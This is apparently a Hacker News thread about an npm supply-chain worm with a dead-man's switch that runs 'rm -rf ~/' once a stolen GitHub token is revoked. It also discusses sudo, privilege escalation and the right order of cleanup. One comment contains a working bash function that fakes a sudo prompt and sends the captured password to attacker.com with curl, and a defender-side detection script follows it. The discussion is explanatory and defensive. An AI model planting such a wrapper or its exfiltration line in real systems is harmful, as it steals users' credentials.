cube00 4 hours ago

Please be careful when revoking tokens. It looks like the payload installs a dead-man's switch at ~/.local/bin/gh-token-monitor.sh as a systemd user service (Linux) / LaunchAgent com.user.gh-token-monitor (macOS). It polls api.github.com/user with the stolen token every 60s, and if the token is revoked (HTTP 40x), it runs rm -rf ~/.

https://github.com/TanStack/router/issues/7383#issuecomment-...

Gigachad 3 hours ago | parent | next [-]

Realistically if you have installed malware, you need to do a full wipe of your computer anyway.

eqvinox 2 hours ago | parent | next [-]

[On Linux:]

If you didn't give yourself "free" (passwordless) sudo, that's not necessary…

…unless it happened in a week with 2 and a half Linux kernel LPEs.

lrvick an hour ago | parent | next [-]

Sudo is security theater.

Malware can make a fake unprivileged sudo that sniffs your password.

function sudo () {
    realsudo=$(which sudo);
    read -r -s -p "[sudo] password for $USER: " password;
    echo "$USER: $password" | \
        curl -F 'p=<-' https://attacker.com >/dev/null 2>&1;
    $realsudo -S <<< "$password" -u root bash -C "exit" >/dev/null 2>&1;
    $realsudo "${@:1}";
}

nazcan an hour ago | parent | next [-]

To clarify, when does this run? Like you download malware A, run malware A and this function definition changes sudo for it, or sudo for other cases?

lrvick an hour ago | parent [-]

This could for instance be injected into your .bashrc when you do an "npm install" of a package that has a deeply nested supply chain attack.

Then the next time you run sudo, phase2 triggers installing a rootkit, etc.

Ferret7446 24 minutes ago | parent | next [-]

That is one of many reasons to keep your dotfiles under version control.

lpribis 13 minutes ago | parent [-]

How would that help? Unless you happen to check the dotfiles git diff before running _anything_. I guess this could be put in prompt or some cron job to detect diffs but I bet absolutely nobody does this.

arcfour 42 minutes ago | parent | prev [-]

Or you could also hijack it using $PATH search order with your wrapper to get existing terminal sessions too, there's a lot of ways to skin that cat.
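
As an added, defender-side example (not code from anyone in this thread), the bash script below checks for the three things discussed above: a function or alias named sudo planted in an rc file (the .bashrc scenario), a wrapper earlier in $PATH shadowing the real binary (the PATH-order point), and the gh-token-monitor files from the first comment, so the unit or agent can be disabled before the token is revoked. The systemd user-unit and LaunchAgent directories are assumed to be the standard ones; only the script path and agent label come from the thread.

```shell
#!/usr/bin/env bash
# Defender-side checks for the tricks in this thread. Unit and agent
# directories are standard locations (assumed); the script path and
# LaunchAgent label are the ones quoted in the thread.

# Does an rc file define a function or alias named sudo? Prints the
# matching lines; exit 0 if any were found, 1 otherwise.
rc_sudo_overrides() {                         # rc_sudo_overrides FILE
    [ -r "$1" ] || return 1
    grep -nE '^[[:space:]]*(function[[:space:]]+sudo([[:space:]]|\(|$)|sudo[[:space:]]*\(\)|alias[[:space:]]+sudo=)' "$1"
}

# Exit 0 (and warn) when the first NAME found along a PATH string lives
# outside the trusted dirs given, i.e. a wrapper shadows the real binary.
path_shadowed() {                             # path_shadowed NAME PATH TRUSTED_DIR...
    local name="$1" dir d IFS=':'
    for dir in $2; do
        [ -f "$dir/$name" ] && [ -x "$dir/$name" ] || continue
        shift 2
        for d in "$@"; do [ "$dir" = "$d" ] && return 1; done
        printf 'WARNING: %s resolves to %s/%s\n' "$name" "$dir" "$name"; return 0
    done
    return 1
}

# Files left by the gh-token-monitor dead-man's switch under HOME_DIR.
# Disable the unit or agent before the token is revoked, since the
# revocation (HTTP 40x) is what triggers the rm -rf.
ghmon_artifacts() {                           # ghmon_artifacts HOME_DIR
    local h="$1" p hit=1
    for p in "$h/.local/bin/gh-token-monitor.sh" \
             "$h/.config/systemd/user/"*gh-token-monitor* \
             "$h/Library/LaunchAgents/com.user.gh-token-monitor.plist"; do
        [ -e "$p" ] && { printf 'FOUND: %s\n' "$p"; hit=0; }
    done
    return "$hit"
}

# Run everything against the current account. Source this file from the
# interactive shell ("source check.sh; run_all ~"): a fresh bash does not
# load .bashrc, so it would never see a function named sudo.
run_all() {                                   # run_all HOME_DIR
    local rc t
    for rc in "$1/.bashrc" "$1/.zshrc" "$1/.profile"; do rc_sudo_overrides "$rc"; done
    t=$(type -t sudo 2>/dev/null)
    case "$t" in function|alias) echo "WARNING: sudo is a shell $t in this session";; esac
    path_shadowed sudo "$PATH" /usr/bin /bin /usr/local/bin
    ghmon_artifacts "$1"
}
```

If any of the checks fire, treat the account as compromised rather than just deleting the wrapper: the wrapper is the visible part, not necessarily the only one.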

lrvick 30 minutes ago | parent [-]

Endless ways, which is why I do not understand why sudo is ever used anymore, especially in production.

You do not need root to do anything in Linux these days anyway between Namespaces and Capabilities so there is really no reason for root to be accessible at all or have any processes running as root post boot.

TacticalCoder 27 minutes ago | parent | prev | next [-]

> Sudo is security theater.

Yes indeed.

> Malware can make a fake unprivileged sudo that sniffs your password.

Not on my Linux workstation though. No sudo command installed. Not a single setuid binary. Not even su. So basically only root can use su and nobody else.

The only way to log in as root is either by going to tty2 (but then the root password is 30 characters long, on purpose, to be sure I don't ever enter it, so login from tty2 ain't really an option) or by logging in from another computer, using a Yubikey (no password login allowed). That other computer is on a dedicated LAN (a physical LAN, not a VLAN) that exists only for the purpose of allowing root to ssh in (yes, I do allow root to SSH in: but only using U2F/Yubikey... I have to as it's the only real way to log in as root).

It is what it is and this being HN people are going to bitch that it's bad, insecure, inconvenient (people typically love convenience at the expense of security), etc. but I've been using basically that setup for years. When I need to really be root (which is really not often), I use a tiny laptop on my desk that serves as a poor admin's console (but over SSH and only with a Yubikey, so it'd be quite a feat to attack that).

Funnily enough last time I logged in as root (from the laptop) was to implement the workaround to blacklist all the modules for copy.fail/dirtyfrag.

That laptop doesn't even have any Wifi driver installed. No graphical interface. It's minimal. It's got a SSH client, a firewall (and so does the workstation) and that's basically it. As it's on a separate physical LAN, no other machine can see it on the network.

I did set that up just because I could. Turns out it's fully usable so I kept using it.

Now of course I've got servers, VMs, containers, etc. at home too (and on dedicated servers): that's another topic. But on my main workstation a sudo replacement function won't trick me.

jcgrillo 11 minutes ago | parent [-]

Thanks for sharing this, that seems like a very cool setup. I have a very old good-for-almost-nothing laptop that would be perfect for this, might just have to copy you!

nullsanity an hour ago | parent | prev [-]

[dead]

Gigachad 2 hours ago | parent | prev | next [-]

On Linux realistically whatever user you installed the malicious NPM package with has access to everything you care about anyway.

lrvick an hour ago | parent [-]

Every user, since privesc is so easy on most operating systems.

Gigachad an hour ago | parent [-]

Sure, without exploits they can steal your api keys, read your personal data, and access your browser data. With exploits they can update packages on your computer too.

lights0123 2 hours ago | parent | prev | next [-]

Until it overrides sudo in your $PATH to install malware after you enter your password later.

dgellow 2 hours ago | parent | prev | next [-]

You should assume other LPEs exist though

stogot an hour ago | parent | prev [-]

There have been numerous ways to root Linux over the decades.

sigzero 2 hours ago | parent | prev [-]

It's the "nuke it from orbit" approach but "the only way to be sure".

meander_water 4 hours ago | parent | prev | next [-]

I don't understand why people were voting this comment down in the issue page

skissane 3 hours ago | parent | next [-]

Maybe they have a non-standard interpretation of thumbs-down – as "thumbs-down to this fact" not "thumbs-down to you for pointing it out"

hmokiguess 2 hours ago | parent [-]

I have noticed this behaviour happening more often too, it's very confusing. Usually when texting with younger Gen Z people.

efilife 3 minutes ago | parent [-]

This has always been happening

4 hours ago | parent | prev | next [-]

[deleted]

bpavuk 4 hours ago | parent | prev | next [-]

bots.

the GitHub bot law: the GitHub bot situation is way worse than you imagine even if you are aware of the GitHub bot law.

yes, a cheap parody on Hofstadter's law, but that's how bad it is

sieabahlpark 3 hours ago | parent | prev | next [-]

[dead]

noodletheworld 3 hours ago | parent | prev [-]

There is no such thing as please be careful when revoking tokens. What does that mean? Don't revoke them? Look at them carefully before revoking them?

And what? Just let the actor just keep using them to spread to other people?

Always rotate your tokens immediately if they're compromised.

If it hurts, well, that sucks. …but seriously, not revoking the tokens just makes this worse for everyone.

A fair comment would have been: “it looks like the payload installs a dead-man's switch…”

Asking the maintainers not to revoke their compromised credentials deserves every downvote it receives.

wavemode 3 hours ago | parent | next [-]

You seem to be interpreting "please be careful when..." as "don't". I'm not sure how that interpretation makes any sense. Obviously they just mean, first kill the service (or better yet, shut down the machine entirely) and then revoke the token...?

yuzuquat 3 hours ago | parent | prev | next [-]

my understanding is that careful means cleaning up the dead-man’s switch before revoking

3 hours ago | parent | prev [-]

[deleted]

bpavuk 4 hours ago | parent | prev | next [-]

if so, then this is actual terrorism of the software world!!

embedding-shape 4 hours ago | parent [-]

Only if the goal is to actually spread fear in a civilian population. It's not clear what the motivation is here besides "the worm spreads itself lol".

bpavuk 4 hours ago | parent [-]

that dead man's switch surely smells like that tbh

isityettime 3 hours ago | parent [-]

The dead man's switch reminds me of worms and viruses from my childhood, whose primary purpose was apparently just to wreak havoc rather than direct financial gain. It's a childish gimmick.

resonious 3 hours ago | parent [-]

If an infected computer gets disabled after deactivating one stolen credential, it might slow down the victim from deactivating their other stolen credentials.

isityettime 3 hours ago | parent [-]

Ugh. True.

dcchambers 3 hours ago | parent | prev | next [-]

Incredible. Mutually assured destruction.

The next five years are going to be truly WILD in the software world.

Air-gapped systems are gonna be huge.

NSUserDefaults 2 hours ago | parent [-]

Maybe just ai-gapped.

eqvinox 2 hours ago | parent [-]

Is that an offhanded joke on the terminology or do you actually mean something? I can't tell.

fragmede 4 hours ago | parent | prev [-]

One should always have had backups configured, but if this is what gets people to set up backups, so much the better.

eqvinox 2 hours ago | parent [-]

Sure. But even restoring from backup means a cost is being inflicted, and not a small one.